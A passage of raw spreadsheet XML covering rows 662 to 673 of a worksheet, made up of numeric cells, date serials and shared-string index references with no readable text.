      <c r="AR662" t="s">
        <v>5225</v>
      </c>
      <c r="AU662">
        <v>26</v>
      </c>
      <c r="AV662">
        <v>2</v>
      </c>
      <c r="AW662">
        <v>0</v>
      </c>
      <c r="AX662">
        <v>0</v>
      </c>
      <c r="AY662">
        <v>13</v>
      </c>
      <c r="AZ662">
        <v>10</v>
      </c>
      <c r="BA662" t="s">
        <v>17011</v>
      </c>
      <c r="BB662" t="s">
        <v>15548</v>
      </c>
      <c r="BC662" t="s">
        <v>9536</v>
      </c>
      <c r="BD662">
        <v>0</v>
      </c>
    </row>
    <row r="663" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A663">
        <v>2577</v>
      </c>
      <c r="B663" t="s">
        <v>5230</v>
      </c>
      <c r="C663" t="s">
        <v>99</v>
      </c>
      <c r="D663" t="s">
        <v>5231</v>
      </c>
      <c r="E663" t="s">
        <v>2252</v>
      </c>
      <c r="F663" t="s">
        <v>5232</v>
      </c>
      <c r="G663" s="1">
        <v>44307</v>
      </c>
      <c r="H663">
        <v>1290</v>
      </c>
      <c r="I663">
        <v>1290</v>
      </c>
      <c r="J663">
        <v>1</v>
      </c>
      <c r="K663">
        <v>0</v>
      </c>
      <c r="L663">
        <v>2</v>
      </c>
      <c r="M663">
        <v>0</v>
      </c>
      <c r="N663">
        <v>0</v>
      </c>
      <c r="O663">
        <v>0</v>
      </c>
      <c r="P663">
        <v>0</v>
      </c>
      <c r="Q663">
        <v>1</v>
      </c>
      <c r="R663">
        <v>2</v>
      </c>
      <c r="S663">
        <v>0</v>
      </c>
      <c r="T663">
        <v>0</v>
      </c>
      <c r="U663">
        <v>500000</v>
      </c>
      <c r="V663">
        <v>0</v>
      </c>
      <c r="W663">
        <v>3000</v>
      </c>
      <c r="X663">
        <v>0</v>
      </c>
      <c r="Y663">
        <v>0</v>
      </c>
      <c r="Z663">
        <v>0</v>
      </c>
      <c r="AA663">
        <v>0</v>
      </c>
      <c r="AB663">
        <v>1000</v>
      </c>
      <c r="AC663">
        <v>1000</v>
      </c>
      <c r="AD663">
        <v>0</v>
      </c>
      <c r="AE663">
        <v>0</v>
      </c>
      <c r="AF663" t="s">
        <v>5233</v>
      </c>
      <c r="AG663">
        <v>14440</v>
      </c>
      <c r="AH663">
        <v>12</v>
      </c>
      <c r="AJ663">
        <v>160</v>
      </c>
      <c r="AK663" t="s">
        <v>114</v>
      </c>
      <c r="AL663" t="s">
        <v>114</v>
      </c>
      <c r="AM663" t="s">
        <v>5234</v>
      </c>
      <c r="AN663" t="s">
        <v>55</v>
      </c>
      <c r="AO663">
        <v>2008</v>
      </c>
      <c r="AP663" t="s">
        <v>5235</v>
      </c>
      <c r="AQ663" t="s">
        <v>5236</v>
      </c>
      <c r="AR663" t="s">
        <v>5237</v>
      </c>
      <c r="AS663" t="s">
        <v>71</v>
      </c>
      <c r="AT663" t="s">
        <v>58</v>
      </c>
      <c r="AU663">
        <v>26</v>
      </c>
      <c r="AV663">
        <v>1</v>
      </c>
      <c r="AW663">
        <v>18</v>
      </c>
      <c r="AX663">
        <v>7</v>
      </c>
      <c r="AY663">
        <v>10</v>
      </c>
      <c r="AZ663">
        <v>11</v>
      </c>
      <c r="BA663" t="s">
        <v>16630</v>
      </c>
      <c r="BB663" t="s">
        <v>15869</v>
      </c>
      <c r="BC663">
        <v>0</v>
      </c>
      <c r="BD663" t="s">
        <v>10170</v>
      </c>
    </row>
    <row r="664" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A664">
        <v>2290</v>
      </c>
      <c r="B664" t="s">
        <v>5238</v>
      </c>
      <c r="C664" t="s">
        <v>168</v>
      </c>
      <c r="D664" t="s">
        <v>5239</v>
      </c>
      <c r="E664" t="s">
        <v>142</v>
      </c>
      <c r="F664" t="s">
        <v>143</v>
      </c>
      <c r="G664" s="1">
        <v>44267</v>
      </c>
      <c r="H664">
        <v>1303</v>
      </c>
      <c r="I664">
        <v>1303</v>
      </c>
      <c r="J664">
        <v>0</v>
      </c>
      <c r="K664">
        <v>0</v>
      </c>
      <c r="L664">
        <v>0</v>
      </c>
      <c r="M664">
        <v>2</v>
      </c>
      <c r="N664">
        <v>0</v>
      </c>
      <c r="O664">
        <v>0</v>
      </c>
      <c r="P664">
        <v>0</v>
      </c>
      <c r="Q664">
        <v>3</v>
      </c>
      <c r="R664">
        <v>20</v>
      </c>
      <c r="S664">
        <v>0</v>
      </c>
      <c r="T664">
        <v>1</v>
      </c>
      <c r="U664">
        <v>0</v>
      </c>
      <c r="V664">
        <v>0</v>
      </c>
      <c r="W664">
        <v>0</v>
      </c>
      <c r="X664">
        <v>100</v>
      </c>
      <c r="Y664">
        <v>0</v>
      </c>
      <c r="Z664">
        <v>0</v>
      </c>
      <c r="AA664">
        <v>0</v>
      </c>
      <c r="AB664">
        <v>50</v>
      </c>
      <c r="AC664">
        <v>5</v>
      </c>
      <c r="AD664">
        <v>0</v>
      </c>
      <c r="AE664">
        <v>100</v>
      </c>
      <c r="AF664" t="s">
        <v>5240</v>
      </c>
      <c r="AG664">
        <v>16730</v>
      </c>
      <c r="AH664">
        <v>13</v>
      </c>
      <c r="AJ664">
        <v>161</v>
      </c>
      <c r="AK664" t="s">
        <v>5241</v>
      </c>
      <c r="AL664" t="s">
        <v>5242</v>
      </c>
      <c r="AM664" t="s">
        <v>5243</v>
      </c>
      <c r="AN664" t="s">
        <v>68</v>
      </c>
      <c r="AO664">
        <v>2017</v>
      </c>
      <c r="AP664">
        <v>85763037477</v>
      </c>
      <c r="AQ664" t="s">
        <v>5244</v>
      </c>
      <c r="AR664" t="s">
        <v>5240</v>
      </c>
      <c r="AS664" t="s">
        <v>71</v>
      </c>
      <c r="AT664" t="s">
        <v>72</v>
      </c>
      <c r="AU664">
        <v>20</v>
      </c>
      <c r="AV664">
        <v>1</v>
      </c>
      <c r="AW664">
        <v>4</v>
      </c>
      <c r="AX664">
        <v>0</v>
      </c>
      <c r="AY664">
        <v>7</v>
      </c>
      <c r="AZ664">
        <v>6</v>
      </c>
      <c r="BA664">
        <v>0</v>
      </c>
      <c r="BB664">
        <v>0</v>
      </c>
      <c r="BC664" t="s">
        <v>12627</v>
      </c>
      <c r="BD664">
        <v>0</v>
      </c>
    </row>
    <row r="665" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A665">
        <v>2602</v>
      </c>
      <c r="B665" t="s">
        <v>5245</v>
      </c>
      <c r="C665" t="s">
        <v>129</v>
      </c>
      <c r="D665" t="s">
        <v>5246</v>
      </c>
      <c r="E665" t="s">
        <v>49</v>
      </c>
      <c r="F665" t="s">
        <v>364</v>
      </c>
      <c r="G665" s="1">
        <v>43913</v>
      </c>
      <c r="H665">
        <v>1311</v>
      </c>
      <c r="I665">
        <v>1311</v>
      </c>
      <c r="J665">
        <v>0</v>
      </c>
      <c r="K665">
        <v>0</v>
      </c>
      <c r="L665">
        <v>0</v>
      </c>
      <c r="M665">
        <v>0</v>
      </c>
      <c r="N665">
        <v>0</v>
      </c>
      <c r="O665">
        <v>0</v>
      </c>
      <c r="P665">
        <v>0</v>
      </c>
      <c r="Q665">
        <v>0</v>
      </c>
      <c r="R665">
        <v>0</v>
      </c>
      <c r="S665">
        <v>1</v>
      </c>
      <c r="T665">
        <v>1</v>
      </c>
      <c r="U665">
        <v>0</v>
      </c>
      <c r="V665">
        <v>0</v>
      </c>
      <c r="W665">
        <v>0</v>
      </c>
      <c r="X665">
        <v>0</v>
      </c>
      <c r="Y665">
        <v>0</v>
      </c>
      <c r="Z665">
        <v>0</v>
      </c>
      <c r="AA665">
        <v>0</v>
      </c>
      <c r="AB665">
        <v>0</v>
      </c>
      <c r="AC665">
        <v>0</v>
      </c>
      <c r="AD665">
        <v>1</v>
      </c>
      <c r="AE665">
        <v>100</v>
      </c>
      <c r="AF665" t="s">
        <v>5247</v>
      </c>
      <c r="AG665">
        <v>42193</v>
      </c>
      <c r="AH665">
        <v>11</v>
      </c>
      <c r="AJ665">
        <v>269</v>
      </c>
      <c r="AK665" t="s">
        <v>5248</v>
      </c>
      <c r="AL665" t="s">
        <v>5249</v>
      </c>
      <c r="AM665" t="s">
        <v>5250</v>
      </c>
      <c r="AN665" t="s">
        <v>55</v>
      </c>
      <c r="AO665">
        <v>2019</v>
      </c>
      <c r="AP665" t="s">
        <v>5251</v>
      </c>
      <c r="AQ665" t="s">
        <v>5252</v>
      </c>
      <c r="AR665" t="s">
        <v>5253</v>
      </c>
      <c r="AS665" t="s">
        <v>371</v>
      </c>
      <c r="AT665" t="s">
        <v>58</v>
      </c>
      <c r="AU665">
        <v>30</v>
      </c>
      <c r="AV665">
        <v>2</v>
      </c>
      <c r="AW665">
        <v>5</v>
      </c>
      <c r="AX665">
        <v>0</v>
      </c>
      <c r="AY665">
        <v>6</v>
      </c>
      <c r="AZ665">
        <v>0</v>
      </c>
      <c r="BA665" t="s">
        <v>16975</v>
      </c>
      <c r="BB665" t="s">
        <v>15873</v>
      </c>
      <c r="BC665" t="s">
        <v>10642</v>
      </c>
      <c r="BD665" t="s">
        <v>10643</v>
      </c>
    </row>
    <row r="666" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A666">
        <v>2541</v>
      </c>
      <c r="B666" t="s">
        <v>5254</v>
      </c>
      <c r="C666" t="s">
        <v>872</v>
      </c>
      <c r="D666" t="s">
        <v>5255</v>
      </c>
      <c r="E666" t="s">
        <v>843</v>
      </c>
      <c r="F666" t="s">
        <v>5256</v>
      </c>
      <c r="G666" s="1">
        <v>44361</v>
      </c>
      <c r="H666">
        <v>1336</v>
      </c>
      <c r="I666">
        <v>1336</v>
      </c>
      <c r="J666">
        <v>2</v>
      </c>
      <c r="K666">
        <v>2</v>
      </c>
      <c r="L666">
        <v>1</v>
      </c>
      <c r="M666">
        <v>0</v>
      </c>
      <c r="N666">
        <v>0</v>
      </c>
      <c r="O666">
        <v>0</v>
      </c>
      <c r="P666">
        <v>0</v>
      </c>
      <c r="Q666">
        <v>0</v>
      </c>
      <c r="R666">
        <v>0</v>
      </c>
      <c r="S666">
        <v>1</v>
      </c>
      <c r="T666">
        <v>1</v>
      </c>
      <c r="U666">
        <v>10000</v>
      </c>
      <c r="V666">
        <v>10000</v>
      </c>
      <c r="W666">
        <v>3000</v>
      </c>
      <c r="X666">
        <v>0</v>
      </c>
      <c r="Y666">
        <v>0</v>
      </c>
      <c r="Z666">
        <v>0</v>
      </c>
      <c r="AA666">
        <v>0</v>
      </c>
      <c r="AB666">
        <v>0</v>
      </c>
      <c r="AC666">
        <v>0</v>
      </c>
      <c r="AD666">
        <v>1</v>
      </c>
      <c r="AE666">
        <v>200</v>
      </c>
      <c r="AF666" t="s">
        <v>5257</v>
      </c>
      <c r="AG666">
        <v>94351</v>
      </c>
      <c r="AH666">
        <v>28</v>
      </c>
      <c r="AJ666">
        <v>390</v>
      </c>
      <c r="AK666" t="s">
        <v>5258</v>
      </c>
      <c r="AL666" t="s">
        <v>5259</v>
      </c>
      <c r="AM666" t="s">
        <v>5260</v>
      </c>
      <c r="AN666" t="s">
        <v>68</v>
      </c>
      <c r="AO666">
        <v>2019</v>
      </c>
      <c r="AP666" t="s">
        <v>5261</v>
      </c>
      <c r="AQ666" t="s">
        <v>5262</v>
      </c>
      <c r="AR666" t="s">
        <v>5263</v>
      </c>
      <c r="AS666" t="s">
        <v>71</v>
      </c>
      <c r="AT666" t="s">
        <v>72</v>
      </c>
      <c r="AU666">
        <v>5</v>
      </c>
      <c r="AV666">
        <v>0</v>
      </c>
      <c r="AW666">
        <v>4</v>
      </c>
      <c r="AX666">
        <v>0</v>
      </c>
      <c r="AY666">
        <v>9</v>
      </c>
      <c r="AZ666">
        <v>7</v>
      </c>
      <c r="BA666" t="s">
        <v>17166</v>
      </c>
      <c r="BB666" t="s">
        <v>15866</v>
      </c>
      <c r="BC666">
        <v>0</v>
      </c>
      <c r="BD666" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="667" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A667">
        <v>2586</v>
      </c>
      <c r="B667" t="s">
        <v>5264</v>
      </c>
      <c r="C667" t="s">
        <v>99</v>
      </c>
      <c r="D667" t="s">
        <v>5265</v>
      </c>
      <c r="E667" t="s">
        <v>300</v>
      </c>
      <c r="F667" t="s">
        <v>5266</v>
      </c>
      <c r="G667" s="1">
        <v>44119</v>
      </c>
      <c r="H667">
        <v>1342</v>
      </c>
      <c r="I667">
        <v>1342</v>
      </c>
      <c r="J667">
        <v>2</v>
      </c>
      <c r="K667">
        <v>0</v>
      </c>
      <c r="L667">
        <v>1</v>
      </c>
      <c r="M667">
        <v>1</v>
      </c>
      <c r="N667">
        <v>0</v>
      </c>
      <c r="O667">
        <v>0</v>
      </c>
      <c r="P667">
        <v>0</v>
      </c>
      <c r="Q667">
        <v>5</v>
      </c>
      <c r="R667">
        <v>20</v>
      </c>
      <c r="S667">
        <v>1</v>
      </c>
      <c r="T667">
        <v>0</v>
      </c>
      <c r="U667">
        <v>1000000</v>
      </c>
      <c r="V667">
        <v>0</v>
      </c>
      <c r="W667">
        <v>5000</v>
      </c>
      <c r="X667">
        <v>2000</v>
      </c>
      <c r="Y667">
        <v>0</v>
      </c>
      <c r="Z667">
        <v>0</v>
      </c>
      <c r="AA667">
        <v>0</v>
      </c>
      <c r="AB667">
        <v>200</v>
      </c>
      <c r="AC667">
        <v>100</v>
      </c>
      <c r="AD667">
        <v>1</v>
      </c>
      <c r="AE667">
        <v>0</v>
      </c>
      <c r="AF667" t="s">
        <v>3533</v>
      </c>
      <c r="AG667">
        <v>14450</v>
      </c>
      <c r="AH667">
        <v>12</v>
      </c>
      <c r="AJ667">
        <v>160</v>
      </c>
      <c r="AK667" t="s">
        <v>114</v>
      </c>
      <c r="AL667" t="s">
        <v>115</v>
      </c>
      <c r="AM667" t="s">
        <v>5267</v>
      </c>
      <c r="AN667" t="s">
        <v>82</v>
      </c>
      <c r="AO667">
        <v>2019</v>
      </c>
      <c r="AP667" t="s">
        <v>5268</v>
      </c>
      <c r="AQ667" t="s">
        <v>5269</v>
      </c>
      <c r="AR667" t="s">
        <v>5270</v>
      </c>
      <c r="AS667" t="s">
        <v>187</v>
      </c>
      <c r="AT667" t="s">
        <v>86</v>
      </c>
      <c r="AU667">
        <v>25</v>
      </c>
      <c r="AV667">
        <v>0</v>
      </c>
      <c r="AW667">
        <v>23</v>
      </c>
      <c r="AX667">
        <v>3</v>
      </c>
      <c r="AY667">
        <v>20</v>
      </c>
      <c r="AZ667">
        <v>15</v>
      </c>
      <c r="BA667" t="s">
        <v>17193</v>
      </c>
      <c r="BB667" t="s">
        <v>15872</v>
      </c>
      <c r="BC667" t="s">
        <v>10174</v>
      </c>
      <c r="BD667" t="s">
        <v>10173</v>
      </c>
    </row>
    <row r="668" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A668">
        <v>2574</v>
      </c>
      <c r="B668" t="s">
        <v>5271</v>
      </c>
      <c r="C668" t="s">
        <v>99</v>
      </c>
      <c r="D668" t="s">
        <v>5272</v>
      </c>
      <c r="E668" t="s">
        <v>142</v>
      </c>
      <c r="F668" t="s">
        <v>182</v>
      </c>
      <c r="G668" s="1">
        <v>44074</v>
      </c>
      <c r="H668">
        <v>1360</v>
      </c>
      <c r="I668">
        <v>1360</v>
      </c>
      <c r="J668">
        <v>1</v>
      </c>
      <c r="K668">
        <v>2</v>
      </c>
      <c r="L668">
        <v>1</v>
      </c>
      <c r="M668">
        <v>0</v>
      </c>
      <c r="N668">
        <v>0</v>
      </c>
      <c r="O668">
        <v>0</v>
      </c>
      <c r="P668">
        <v>0</v>
      </c>
      <c r="Q668">
        <v>1</v>
      </c>
      <c r="R668">
        <v>1</v>
      </c>
      <c r="S668">
        <v>1</v>
      </c>
      <c r="T668">
        <v>0</v>
      </c>
      <c r="U668">
        <v>100000</v>
      </c>
      <c r="V668">
        <v>20000</v>
      </c>
      <c r="W668">
        <v>3000</v>
      </c>
      <c r="X668">
        <v>0</v>
      </c>
      <c r="Y668">
        <v>0</v>
      </c>
      <c r="Z668">
        <v>0</v>
      </c>
      <c r="AA668">
        <v>0</v>
      </c>
      <c r="AB668">
        <v>10</v>
      </c>
      <c r="AC668">
        <v>10</v>
      </c>
      <c r="AD668">
        <v>1</v>
      </c>
      <c r="AE668">
        <v>0</v>
      </c>
      <c r="AF668" t="s">
        <v>5273</v>
      </c>
      <c r="AG668">
        <v>14440</v>
      </c>
      <c r="AH668">
        <v>12</v>
      </c>
      <c r="AJ668">
        <v>160</v>
      </c>
      <c r="AK668" t="s">
        <v>114</v>
      </c>
      <c r="AL668" t="s">
        <v>114</v>
      </c>
      <c r="AM668" t="s">
        <v>5274</v>
      </c>
      <c r="AN668" t="s">
        <v>55</v>
      </c>
      <c r="AO668">
        <v>2015</v>
      </c>
      <c r="AP668">
        <v>216690476</v>
      </c>
      <c r="AQ668" t="s">
        <v>5275</v>
      </c>
      <c r="AR668" t="s">
        <v>5273</v>
      </c>
      <c r="AS668" t="s">
        <v>71</v>
      </c>
      <c r="AT668" t="s">
        <v>58</v>
      </c>
      <c r="AU668">
        <v>0</v>
      </c>
      <c r="AV668">
        <v>0</v>
      </c>
      <c r="AW668">
        <v>10</v>
      </c>
      <c r="AX668">
        <v>2</v>
      </c>
      <c r="AY668">
        <v>4</v>
      </c>
      <c r="AZ668">
        <v>0</v>
      </c>
      <c r="BA668" t="s">
        <v>17185</v>
      </c>
      <c r="BB668" t="s">
        <v>17197</v>
      </c>
      <c r="BC668" t="s">
        <v>9536</v>
      </c>
      <c r="BD668" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="669" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A669">
        <v>2564</v>
      </c>
      <c r="B669" t="s">
        <v>5276</v>
      </c>
      <c r="C669" t="s">
        <v>99</v>
      </c>
      <c r="D669" t="s">
        <v>5277</v>
      </c>
      <c r="E669" t="s">
        <v>142</v>
      </c>
      <c r="F669" t="s">
        <v>5278</v>
      </c>
      <c r="G669" s="1">
        <v>43885</v>
      </c>
      <c r="H669">
        <v>1369</v>
      </c>
      <c r="I669">
        <v>1369</v>
      </c>
      <c r="J669">
        <v>2</v>
      </c>
      <c r="K669">
        <v>0</v>
      </c>
      <c r="L669">
        <v>0</v>
      </c>
      <c r="M669">
        <v>0</v>
      </c>
      <c r="N669">
        <v>0</v>
      </c>
      <c r="O669">
        <v>0</v>
      </c>
      <c r="P669">
        <v>0</v>
      </c>
      <c r="Q669">
        <v>0</v>
      </c>
      <c r="R669">
        <v>0</v>
      </c>
      <c r="S669">
        <v>0</v>
      </c>
      <c r="T669">
        <v>0</v>
      </c>
      <c r="U669">
        <v>1000000</v>
      </c>
      <c r="V669">
        <v>0</v>
      </c>
      <c r="W669">
        <v>0</v>
      </c>
      <c r="X669">
        <v>0</v>
      </c>
      <c r="Y669">
        <v>0</v>
      </c>
      <c r="Z669">
        <v>0</v>
      </c>
      <c r="AA669">
        <v>0</v>
      </c>
      <c r="AB669">
        <v>0</v>
      </c>
      <c r="AC669">
        <v>0</v>
      </c>
      <c r="AD669">
        <v>0</v>
      </c>
      <c r="AE669">
        <v>0</v>
      </c>
      <c r="AF669" t="s">
        <v>5279</v>
      </c>
      <c r="AG669">
        <v>14440</v>
      </c>
      <c r="AH669">
        <v>12</v>
      </c>
      <c r="AJ669">
        <v>160</v>
      </c>
      <c r="AK669" t="s">
        <v>114</v>
      </c>
      <c r="AL669" t="s">
        <v>114</v>
      </c>
      <c r="AM669" t="s">
        <v>5280</v>
      </c>
      <c r="AN669" t="s">
        <v>55</v>
      </c>
      <c r="AO669">
        <v>2008</v>
      </c>
      <c r="AP669">
        <v>2166696485</v>
      </c>
      <c r="AQ669" t="s">
        <v>5281</v>
      </c>
      <c r="AR669" t="s">
        <v>5282</v>
      </c>
      <c r="AS669" t="s">
        <v>179</v>
      </c>
      <c r="AT669" t="s">
        <v>58</v>
      </c>
      <c r="AU669">
        <v>0</v>
      </c>
      <c r="AV669">
        <v>0</v>
      </c>
      <c r="AW669">
        <v>6</v>
      </c>
      <c r="AX669">
        <v>0</v>
      </c>
      <c r="AY669">
        <v>0</v>
      </c>
      <c r="AZ669">
        <v>1</v>
      </c>
      <c r="BA669" t="s">
        <v>17148</v>
      </c>
      <c r="BB669" t="s">
        <v>15886</v>
      </c>
      <c r="BC669" t="s">
        <v>10212</v>
      </c>
      <c r="BD669" t="s">
        <v>10213</v>
      </c>
    </row>
    <row r="670" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A670">
        <v>2557</v>
      </c>
      <c r="B670" t="s">
        <v>5283</v>
      </c>
      <c r="C670" t="s">
        <v>157</v>
      </c>
      <c r="D670" t="s">
        <v>5284</v>
      </c>
      <c r="E670" t="s">
        <v>142</v>
      </c>
      <c r="F670" t="s">
        <v>5285</v>
      </c>
      <c r="G670" s="1">
        <v>44287</v>
      </c>
      <c r="H670">
        <v>1376</v>
      </c>
      <c r="I670">
        <v>1376</v>
      </c>
      <c r="J670">
        <v>4</v>
      </c>
      <c r="K670">
        <v>7</v>
      </c>
      <c r="L670">
        <v>4</v>
      </c>
      <c r="M670">
        <v>2</v>
      </c>
      <c r="N670">
        <v>0</v>
      </c>
      <c r="O670">
        <v>0</v>
      </c>
      <c r="P670">
        <v>0</v>
      </c>
      <c r="Q670">
        <v>4</v>
      </c>
      <c r="R670">
        <v>0</v>
      </c>
      <c r="S670">
        <v>1</v>
      </c>
      <c r="T670">
        <v>1</v>
      </c>
      <c r="U670">
        <v>480000</v>
      </c>
      <c r="V670">
        <v>7</v>
      </c>
      <c r="W670">
        <v>20000</v>
      </c>
      <c r="X670">
        <v>3000</v>
      </c>
      <c r="Y670">
        <v>0</v>
      </c>
      <c r="Z670">
        <v>0</v>
      </c>
      <c r="AA670">
        <v>0</v>
      </c>
      <c r="AB670">
        <v>4000</v>
      </c>
      <c r="AC670">
        <v>0</v>
      </c>
      <c r="AD670">
        <v>1</v>
      </c>
      <c r="AE670">
        <v>30000</v>
      </c>
      <c r="AF670" t="s">
        <v>5286</v>
      </c>
      <c r="AG670">
        <v>61261</v>
      </c>
      <c r="AH670">
        <v>16</v>
      </c>
      <c r="AJ670">
        <v>242</v>
      </c>
      <c r="AK670" t="s">
        <v>4071</v>
      </c>
      <c r="AL670" t="s">
        <v>5287</v>
      </c>
      <c r="AM670" t="s">
        <v>5288</v>
      </c>
      <c r="AN670" t="s">
        <v>55</v>
      </c>
      <c r="AO670">
        <v>2010</v>
      </c>
      <c r="AP670" t="s">
        <v>5289</v>
      </c>
      <c r="AQ670" t="s">
        <v>5290</v>
      </c>
      <c r="AR670" t="s">
        <v>5291</v>
      </c>
      <c r="AS670" t="s">
        <v>71</v>
      </c>
      <c r="AT670" t="s">
        <v>58</v>
      </c>
      <c r="AU670">
        <v>26</v>
      </c>
      <c r="AV670">
        <v>1</v>
      </c>
      <c r="AW670">
        <v>0</v>
      </c>
      <c r="AX670">
        <v>0</v>
      </c>
      <c r="AY670">
        <v>157</v>
      </c>
      <c r="AZ670">
        <v>144</v>
      </c>
      <c r="BA670" t="s">
        <v>16785</v>
      </c>
      <c r="BB670" t="s">
        <v>15862</v>
      </c>
      <c r="BC670">
        <v>0</v>
      </c>
      <c r="BD670" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="671" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A671">
        <v>2608</v>
      </c>
      <c r="B671" t="s">
        <v>5292</v>
      </c>
      <c r="C671" t="s">
        <v>47</v>
      </c>
      <c r="D671" t="s">
        <v>5293</v>
      </c>
      <c r="E671" t="s">
        <v>5294</v>
      </c>
      <c r="F671" t="s">
        <v>5295</v>
      </c>
      <c r="G671" s="1">
        <v>44120</v>
      </c>
      <c r="H671">
        <v>1382</v>
      </c>
      <c r="I671">
        <v>1382</v>
      </c>
      <c r="J671">
        <v>5</v>
      </c>
      <c r="K671">
        <v>0</v>
      </c>
      <c r="L671">
        <v>2</v>
      </c>
      <c r="M671">
        <v>4</v>
      </c>
      <c r="N671">
        <v>0</v>
      </c>
      <c r="O671">
        <v>0</v>
      </c>
      <c r="P671">
        <v>9</v>
      </c>
      <c r="Q671">
        <v>20</v>
      </c>
      <c r="R671">
        <v>100</v>
      </c>
      <c r="S671">
        <v>10</v>
      </c>
      <c r="T671">
        <v>1</v>
      </c>
      <c r="U671">
        <v>2000000</v>
      </c>
      <c r="V671">
        <v>0</v>
      </c>
      <c r="W671">
        <v>5000</v>
      </c>
      <c r="X671">
        <v>300</v>
      </c>
      <c r="Y671">
        <v>0</v>
      </c>
      <c r="Z671">
        <v>0</v>
      </c>
      <c r="AA671">
        <v>2800</v>
      </c>
      <c r="AB671">
        <v>1000</v>
      </c>
      <c r="AC671">
        <v>50000</v>
      </c>
      <c r="AD671">
        <v>2000</v>
      </c>
      <c r="AE671">
        <v>400000</v>
      </c>
      <c r="AF671" t="s">
        <v>5296</v>
      </c>
      <c r="AG671">
        <v>20242</v>
      </c>
      <c r="AH671">
        <v>2</v>
      </c>
      <c r="AJ671">
        <v>53</v>
      </c>
      <c r="AK671" t="s">
        <v>1582</v>
      </c>
      <c r="AL671" t="s">
        <v>1583</v>
      </c>
      <c r="AM671" t="s">
        <v>5297</v>
      </c>
      <c r="AN671" t="s">
        <v>82</v>
      </c>
      <c r="AO671">
        <v>1984</v>
      </c>
      <c r="AP671" t="s">
        <v>5298</v>
      </c>
      <c r="AQ671" t="s">
        <v>5299</v>
      </c>
      <c r="AR671" t="s">
        <v>5296</v>
      </c>
      <c r="AS671" t="s">
        <v>71</v>
      </c>
      <c r="AT671" t="s">
        <v>58</v>
      </c>
      <c r="AU671">
        <v>25</v>
      </c>
      <c r="AV671">
        <v>1</v>
      </c>
      <c r="AW671">
        <v>96</v>
      </c>
      <c r="AX671">
        <v>778</v>
      </c>
      <c r="AY671">
        <v>238</v>
      </c>
      <c r="AZ671">
        <v>781</v>
      </c>
      <c r="BA671" t="s">
        <v>16740</v>
      </c>
      <c r="BB671" t="s">
        <v>17216</v>
      </c>
      <c r="BC671" t="s">
        <v>9485</v>
      </c>
      <c r="BD671" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="672" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A672">
        <v>1729</v>
      </c>
      <c r="B672" t="s">
        <v>5300</v>
      </c>
      <c r="C672" t="s">
        <v>477</v>
      </c>
      <c r="D672" t="s">
        <v>5301</v>
      </c>
      <c r="E672" t="s">
        <v>131</v>
      </c>
      <c r="F672" t="s">
        <v>1455</v>
      </c>
      <c r="G672" s="1">
        <v>43997</v>
      </c>
      <c r="H672">
        <v>1426</v>
      </c>
      <c r="I672">
        <v>1426</v>
      </c>
      <c r="J672">
        <v>0</v>
      </c>
      <c r="K672">
        <v>1</v>
      </c>
      <c r="L672">
        <v>0</v>
      </c>
      <c r="M672">
        <v>0</v>
      </c>
      <c r="N672">
        <v>0</v>
      </c>
      <c r="O672">
        <v>0</v>
      </c>
      <c r="P672">
        <v>0</v>
      </c>
      <c r="Q672">
        <v>0</v>
      </c>
      <c r="R672">
        <v>1</v>
      </c>
      <c r="S672">
        <v>0</v>
      </c>
      <c r="T672">
        <v>1</v>
      </c>
      <c r="U672">
        <v>0</v>
      </c>
      <c r="V672">
        <v>100000</v>
      </c>
      <c r="W672">
        <v>0</v>
      </c>
      <c r="X672">
        <v>0</v>
      </c>
      <c r="Y672">
        <v>0</v>
      </c>
      <c r="Z672">
        <v>0</v>
      </c>
      <c r="AA672">
        <v>0</v>
      </c>
      <c r="AB672">
        <v>0</v>
      </c>
      <c r="AC672">
        <v>1000</v>
      </c>
      <c r="AD672">
        <v>0</v>
      </c>
      <c r="AE672">
        <v>100000</v>
      </c>
      <c r="AF672" t="s">
        <v>5302</v>
      </c>
      <c r="AG672">
        <v>95954</v>
      </c>
      <c r="AH672">
        <v>29</v>
      </c>
      <c r="AJ672">
        <v>375</v>
      </c>
      <c r="AK672" t="s">
        <v>5303</v>
      </c>
      <c r="AL672" t="s">
        <v>5304</v>
      </c>
      <c r="AM672" t="s">
        <v>5305</v>
      </c>
      <c r="AN672" t="s">
        <v>55</v>
      </c>
      <c r="AO672">
        <v>2000</v>
      </c>
      <c r="AP672" t="s">
        <v>5306</v>
      </c>
      <c r="AQ672" t="s">
        <v>5307</v>
      </c>
      <c r="AR672" t="s">
        <v>5302</v>
      </c>
      <c r="AS672" t="s">
        <v>71</v>
      </c>
      <c r="AT672" t="s">
        <v>58</v>
      </c>
      <c r="AU672">
        <v>26</v>
      </c>
      <c r="AV672">
        <v>0</v>
      </c>
      <c r="AW672">
        <v>4</v>
      </c>
      <c r="AX672">
        <v>15</v>
      </c>
      <c r="AY672">
        <v>11</v>
      </c>
      <c r="AZ672">
        <v>23</v>
      </c>
      <c r="BA672" t="s">
        <v>16981</v>
      </c>
      <c r="BB672" t="s">
        <v>15478</v>
      </c>
      <c r="BC672">
        <v>0</v>
      </c>
      <c r="BD672" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="673" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A673">
        <v>2583</v>
      </c>
      <c r="B673" t="s">
        <v>5308</v>
      </c>
      <c r="C673" t="s">
        <v>99</v>
      </c>
      <c r="D673" t="s">
        <v>5309</v>
      </c>
      <c r="E673" t="s">
        <v>111</v>
      </c>
      <c r="F673" t="s">
        <v>5310</v>
      </c>
      <c r="G673" s="1">
        <v>43903</v>
      </c>
      <c r="H673">
        <v>1437</v>
      </c>
      <c r="I673">
        <v>1437</v>
      </c>
      <c r="J673">
        <v>2</v>
      </c>
      <c r="K673">
        <v>0</v>
      </c>
      <c r="L673">
        <v>1</v>
      </c>
      <c r="M673">
        <v>1</v>
      </c>
      <c r="N673">
        <v>0</v>
